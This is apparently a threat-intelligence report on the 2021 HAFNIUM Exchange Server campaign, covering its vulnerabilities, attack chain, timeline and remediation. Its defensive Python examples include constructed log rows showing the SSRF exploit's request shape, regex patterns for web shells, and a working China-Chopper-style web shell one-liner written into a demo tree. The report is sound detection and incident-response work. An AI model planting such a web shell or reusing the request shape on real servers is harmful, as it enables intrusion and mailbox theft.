TP-CAMP-2021-0001 critical AI Draft B

HAFNIUM Exchange Server Exploitation Campaign

Start Date January 1, 2021
End Date April 13, 2021
Attack Type Zero-Day Exploitation / Web Shell Persistence
Sector Multiple
Geography Global
Threat Actor HAFNIUM
Attribution A2
Confidence B

Executive Summary

The HAFNIUM Exchange Server exploitation campaign was a 2021 operation against on-premises Microsoft Exchange Server deployments. Microsoft disclosed on March 2, 2021 that it had detected multiple zero-day exploits used in targeted attacks, and it attributed the initial campaign activity to HAFNIUM. CISA warned that successful exploitation could allow unauthenticated attackers to execute code on vulnerable Exchange servers, gain persistent access, reach mailboxes and files, and compromise credentials or identity trust inside affected networks.

The campaign moved from targeted exploitation into a multi-actor incident after disclosure and patch release. The U.S. Department of Justice later stated that certain hacking groups exploited Exchange zero-days through January and February 2021, while other groups followed in early March after the vulnerabilities became public. By April 13, 2021, the FBI had completed a court-authorized operation to copy and remove one early hacking group’s remaining web shells from hundreds of U.S.-based Exchange servers.

Technical Analysis

The initial intrusion path centered on four Exchange Server vulnerabilities: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. CVE-2021-26855 was an unauthenticated server-side request forgery in Exchange: anyone who could reach the server over HTTPS could send arbitrary HTTP requests and authenticate as the Exchange server itself, with no credentials at all. The other three required an authenticated context. CVE-2021-26857 was an insecure deserialization flaw in the Unified Messaging service that yielded code execution as SYSTEM, and CVE-2021-26858 and CVE-2021-27065 were post-authentication arbitrary file write flaws. That authenticated context could come from the SSRF bug or from stolen administrator credentials, so an attacker with no prior foothold could chain the SSRF into the file-write bugs and drop files into web-served directories.

After gaining access, Microsoft observed HAFNIUM operators deploying web shells to compromised servers. Those web shells gave the operators a remote administration path that could persist even after the vulnerable server was patched, unless the web shell and any follow-on tooling were found and removed. Microsoft also described post-exploitation activity that included LSASS memory dumping with Procdump, use of 7-Zip to compress stolen data, Exchange PowerShell mailbox export activity, and use of PowerShell-based tools such as Nishang and PowerCat.

CISA framed the defensive problem as both server compromise and possible identity compromise. Its advisory warned that attackers could reach files and mailboxes on the Exchange server, credentials stored on the system, and potentially the Active Directory environment. That made simple patching insufficient for already-compromised environments: responders also needed to search for web shells, collect forensic artifacts, assess credential exposure, and review identity trust.

Attack Chain

Stage 1: Internet-Facing Exchange Discovery

Attackers identified exposed on-premises Exchange Server systems. The campaign did not affect Exchange Online or Microsoft 365 cloud email services according to Microsoft and CISA guidance.

Stage 2: Zero-Day Exploitation

Operators exploited CVE-2021-26855 to authenticate to Exchange as the server itself, then used the post-authentication file-write and deserialization vulnerabilities to write files into web-served paths or execute code.

Stage 3: Web Shell Placement

The operators placed web shells on compromised servers. The web shells allowed continued remote administration of the server after the initial exploitation step.

Stage 4: Post-Exploitation Activity

Microsoft reported activity consistent with credential access, mailbox export, compressed data staging, and reverse-shell tooling. CISA warned that attackers could gain access to files, mailboxes, credentials, and identity infrastructure.

Stage 5: Follow-On Opportunistic Exploitation

After public disclosure and patch release, other groups also exploited the same vulnerability set. This follow-on activity moved the operational response beyond the initially attributed HAFNIUM activity.

Stage 6: Public-Private Remediation

Microsoft released patches, detection scripts, mitigation tooling, and indicators. CISA published advisory guidance, and the FBI, under court authorization announced by the Justice Department, later copied and removed remaining web shells from hundreds of U.S.-based servers.

MITRE ATT&CK Mapping

Initial Access

T1190 - Exploit Public-Facing Application: The campaign used vulnerabilities in internet-facing on-premises Exchange Server services to gain access.

Persistence

T1505.003 - Server Software Component: Web Shell: Web shells were deployed to provide continued remote access to compromised Exchange servers.

Execution

T1059.001 - Command and Scripting Interpreter: PowerShell: Microsoft described Exchange PowerShell snap-ins and PowerShell-based tooling during post-exploitation.

Credential Access

T1003.001 - OS Credential Dumping: LSASS Memory: Microsoft reported Procdump being used to dump LSASS process memory on compromised servers.

Collection

T1005 - Data from Local System: Source reporting described file access, offline address book access, and credential exposure risks on compromised servers.

T1114.002 - Email Collection: Remote Email Collection: Exchange PowerShell snap-ins were added and used to export mailbox data from the compromised server.

T1560.001 - Archive Collected Data: Archive via Utility: 7-Zip was used to compress stolen data for exfiltration.

Timeline

2021-01-01 — Exploitation Window Begins

The Justice Department later stated that certain hacking groups exploited Microsoft Exchange Server zero-days through January and February 2021.

2021-03-02 — Microsoft Discloses Exchange Zero-Day Exploitation

Microsoft disclosed attacks against on-premises Exchange Server, attributed the initial campaign activity to HAFNIUM, and released out-of-band security updates.

2021-03-03 — CISA Publishes AA21-062A

CISA published mitigation guidance for Exchange Server exploitation, including vulnerability details, response steps, and indicators of compromise.

2021-03-05 — Microsoft Reports Multiple Actors

Microsoft updated its guidance to state that multiple malicious actors were taking advantage of unpatched systems beyond the initially reported HAFNIUM activity.

2021-03-15 — Microsoft Releases Mitigation Tooling

Microsoft released the Exchange On-Premises Mitigation Tool (EOMT), a one-click script aimed at organizations without dedicated security teams. It applied the IIS URL Rewrite mitigation for CVE-2021-26855, ran the Microsoft Safety Scanner, and attempted to reverse changes made by identified threats. It was an interim mitigation and detection step, not a substitute for installing the security updates.

2021-04-13 — Justice Department Announces Web Shell Removal

The Justice Department announced a court-authorized FBI operation to copy and remove one early hacking group’s remaining web shells from hundreds of vulnerable U.S.-based Exchange servers.

2021-07-19 — U.S. Government Attribution Update

CISA updated AA21-062A to state that the U.S. Government attributed the activity to malicious cyber actors affiliated with the People’s Republic of China Ministry of State Security.

Remediation & Mitigation

Defenders needed to patch affected on-premises Exchange Server versions, but patching alone did not remove existing web shells or other post-exploitation artifacts. CISA and Microsoft directed organizations to inspect Exchange logs, search expected web paths for unexpected ASPX files, collect forensic artifacts, and look for evidence of credential, mailbox, and identity-system compromise.
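The log inspection called for above, and the CVE-2021-26855 footprint described in the Technical Analysis, as an added Python example (written for this page, not Microsoft's or CISA's own detection script): an unauthenticated HttpProxy request whose AnchorMailbox routing hint carries a backend host, port and path ("ServerInfo~<host>:<port>/<path>") is what the SSRF leaves behind. The log excerpt is constructed, not a real capture, and is trimmed to the columns the check needs; the assumed log location (<Exchange install>\Logging\HttpProxy\<protocol>\*.log) and column names are taken from the Exchange 2016/2019 HttpProxy format.

```python
from __future__ import annotations

import csv
from collections import defaultdict
from dataclasses import dataclass

# Constructed HttpProxy-style excerpt (NOT a real capture). Real HttpProxy logs
# carry many more columns; only those the check needs are kept here. Rows 1-2
# model the unauthenticated CVE-2021-26855 request shape: empty AuthenticatedUser
# and an AnchorMailbox of the form ServerInfo~<host>:<port>/<backend path>.
SAMPLE_HTTPPROXY_LOG = """\
DateTime,RequestId,Protocol,UrlHost,UrlStem,AuthenticationType,IsAuthenticated,AuthenticatedUser,AnchorMailbox,UserAgent,ClientIpAddress,ServerHostName,HttpStatus,BackEndStatus,Method
2021-03-01T04:12:09.113Z,r-0001,Ecp,mail.example.test,/ecp/y.js,Anonymous,false,,ServerInfo~a]@mail.example.test:444/autodiscover/autodiscover.xml?#,Mozilla/5.0,198.51.100.7,EXCH01,200,200,GET
2021-03-01T04:12:11.402Z,r-0002,Ecp,mail.example.test,/ecp/y.js,Anonymous,false,,ServerInfo~a]@mail.example.test:444/mapi/emsmdb/?#,Mozilla/5.0,198.51.100.7,EXCH01,200,200,POST
2021-03-01T04:13:30.010Z,r-0003,Owa,mail.example.test,/owa/auth/logon.aspx,Anonymous,false,,,Mozilla/5.0,203.0.113.20,EXCH01,200,200,GET
2021-03-01T04:15:02.555Z,r-0004,Ecp,mail.example.test,/ecp/default.aspx,FormsAuth,true,EXAMPLE\\admin,ServerInfo~EXCH01.example.test,Mozilla/5.0,10.0.0.5,EXCH01,200,200,GET
2021-03-01T04:16:44.900Z,r-0005,Mapi,mail.example.test,/mapi/emsmdb/,Ntlm,true,EXAMPLE\\jdoe,Sid~S-1-5-21-1-2-3-1104,MapiHttpClient,10.0.0.9,EXCH01,200,200,POST
"""

ANCHOR_PREFIX = "ServerInfo~"


@dataclass(frozen=True)
class ProxyLogonHit:
    when: str
    client_ip: str
    url_stem: str
    anchor_mailbox: str

    def backend_path(self) -> str:
        """Backend path the SSRF asked the front end to proxy to."""
        return "/" + self.anchor_mailbox.split("/", 1)[1]


def iter_httpproxy_rows(text: str):
    """Yield rows as dicts; tolerate leading '#' comment lines and blank lines."""
    lines = [ln for ln in text.splitlines() if ln.strip() and not ln.startswith("#")]
    return csv.DictReader(lines)


def is_unauthenticated_backend_anchor(anchor: str) -> bool:
    """A plain ServerInfo~<server> anchor is normal routing data; one that
    embeds a host:port/path target is what the SSRF exploit produces."""
    return anchor.startswith(ANCHOR_PREFIX) and "/" in anchor[len(ANCHOR_PREFIX):]


def find_proxylogon_hits(text: str) -> list[ProxyLogonHit]:
    """Rows with an empty AuthenticatedUser and a backend-target anchor. This
    mirrors the HttpProxy condition in Microsoft's published detection
    guidance; treat matches as leads to correlate, not proof of compromise."""
    hits: list[ProxyLogonHit] = []
    for row in iter_httpproxy_rows(text):
        if (row.get("AuthenticatedUser") or "").strip():
            continue
        anchor = row.get("AnchorMailbox") or ""
        if is_unauthenticated_backend_anchor(anchor):
            hits.append(ProxyLogonHit(row["DateTime"], row["ClientIpAddress"],
                                      row["UrlStem"], anchor))
    return hits


def summarize_by_source(hits: list[ProxyLogonHit]) -> dict[str, list[str]]:
    """Group hits by client IP and list the backend paths each one targeted."""
    by_ip: dict[str, set[str]] = defaultdict(set)
    for h in hits:
        by_ip[h.client_ip].add(h.backend_path())
    return {ip: sorted(paths) for ip, paths in sorted(by_ip.items())}


if __name__ == "__main__":
    found = find_proxylogon_hits(SAMPLE_HTTPPROXY_LOG)
    for h in found:
        print(f"{h.when} {h.client_ip} {h.url_stem} -> {h.backend_path()}")
    print(summarize_by_source(found))
```

Against a real server, feed every *.log under each protocol subfolder of Logging\HttpProxy through find_proxylogon_hits, since the exploit requests landed under ECP, OWA and other front-end paths, and collect the logs early because Exchange rotates them. Pivot on each flagged ClientIpAddress into the IIS logs, and check the ECP server logs for Set-<AppName>VirtualDirectory entries whose properties contain script rather than a plain URL, which is how a CVE-2021-27065 file write shows up.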

Organizations with exposed Exchange servers should treat confirmed exploitation as an incident-response event. Practical steps include applying supported Exchange security updates, isolating vulnerable servers when patching cannot occur immediately, removing web shells, rotating credentials that may have been exposed, reviewing mailbox export activity, and checking for unauthorized changes in Active Directory and Exchange configuration.
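The web shell hunt from the steps above, and the web shell persistence described in the Technical Analysis, as a second added Python example (written for this page, not taken from any vendor tool): it walks the web directories most often reported as drop locations, flags script files absent from a clean-install baseline, and applies content heuristics for server-side scripts that evaluate request-supplied input. The directory list, the baseline file set and the sample tree it builds (including the China-Chopper-style one-liner) are constructed assumptions for the demo; a real baseline comes from a known-good server of the same build.

```python
from __future__ import annotations

import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Web directories commonly reported as web shell drop locations in this campaign,
# relative to a review root (assumption: adjust to the real install paths, and
# point the root at a mounted image or copied tree rather than the live server).
HUNT_DIRS = [
    Path("inetpub/wwwroot/aspnet_client"),
    Path("Exchange Server/V15/FrontEnd/HttpProxy/owa/auth"),
    Path("Exchange Server/V15/FrontEnd/HttpProxy/ecp/auth"),
]

SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx"}

# Constructed baseline for the demo. A real baseline is the script-file list (and
# hashes) taken from a known-good server of the same build, never from the suspect.
BASELINE = {
    Path("Exchange Server/V15/FrontEnd/HttpProxy/owa/auth/logon.aspx"),
    Path("Exchange Server/V15/FrontEnd/HttpProxy/owa/auth/errorFE.aspx"),
}

# Content heuristics: server-side script that evaluates request-supplied input
# or spawns processes. runat="server" alone is normal and is deliberately absent.
SHELL_PATTERNS = [
    re.compile(r"eval\s*\(\s*Request", re.I),
    re.compile(r'Request\s*\[\s*"[^"]+"\s*\]\s*,\s*"unsafe"', re.I),
    re.compile(r"ProcessStartInfo|Process\.Start|Assembly\.Load", re.I),
]


@dataclass(frozen=True)
class Finding:
    relpath: str
    reason: str


def content_indicators(text: str) -> list[str]:
    """Patterns (as regex source) that match the file content."""
    return [p.pattern for p in SHELL_PATTERNS if p.search(text)]


def hunt_web_shells(root: Path, baseline: set[Path] = BASELINE) -> list[Finding]:
    """Flag script files under the hunt directories that are not in the
    baseline or whose content matches a shell heuristic."""
    findings: list[Finding] = []
    for hunt_dir in HUNT_DIRS:
        base = root / hunt_dir
        if not base.is_dir():
            continue
        for path in sorted(base.rglob("*")):
            if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTENSIONS:
                continue
            rel = path.relative_to(root)
            reasons = []
            if rel not in baseline:
                reasons.append("not in clean-install baseline")
            hits = content_indicators(path.read_text(errors="replace"))
            if hits:
                reasons.append("content matches: " + "; ".join(hits))
            if reasons:
                findings.append(Finding(rel.as_posix(), " | ".join(reasons)))
    return findings


def build_sample_tree(root: Path) -> None:
    """Constructed sample tree (not a real capture): two expected files, a
    China-Chopper-style one-liner dropped beside them, and a stray ASPX file
    with harmless content under aspnet_client."""
    owa_auth = root / "Exchange Server/V15/FrontEnd/HttpProxy/owa/auth"
    aspnet = root / "inetpub/wwwroot/aspnet_client/system_web"
    owa_auth.mkdir(parents=True)
    aspnet.mkdir(parents=True)
    (owa_auth / "logon.aspx").write_text(
        '<%@ Page Language="C#" %>\n<form runat="server">sign in</form>\n')
    (owa_auth / "errorFE.aspx").write_text('<%@ Page Language="C#" %>\n<p>error</p>\n')
    (owa_auth / "help.aspx").write_text(
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>\n')
    (aspnet / "xx.aspx").write_text("<%-- placeholder --%>\n")
    (aspnet.parent / "web.config").write_text("<configuration/>\n")


def run_demo() -> list[Finding]:
    """Build the sample tree in a temporary directory and hunt it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return hunt_web_shells(root)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f.relpath}: {f.reason}")
```

A file that is merely absent from the baseline is a lead (a stray ASPX file with no script in it can still be an operator's leftover), while a content match on an unexpected file is a strong hit. Either way, copy the file and its timestamps for forensics before removing it, and extend the search with file creation times and the IIS access log for requests to the flagged paths, since a shell is only useful to the operator if it was actually requested.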

The campaign also reinforced an operational lesson for internet-facing collaboration systems. Externally reachable email infrastructure needs rapid patch paths, asset inventory, centralized logging, and tested procedures for hunting web shells and credential access after a server-side exploit is disclosed.

Sources & References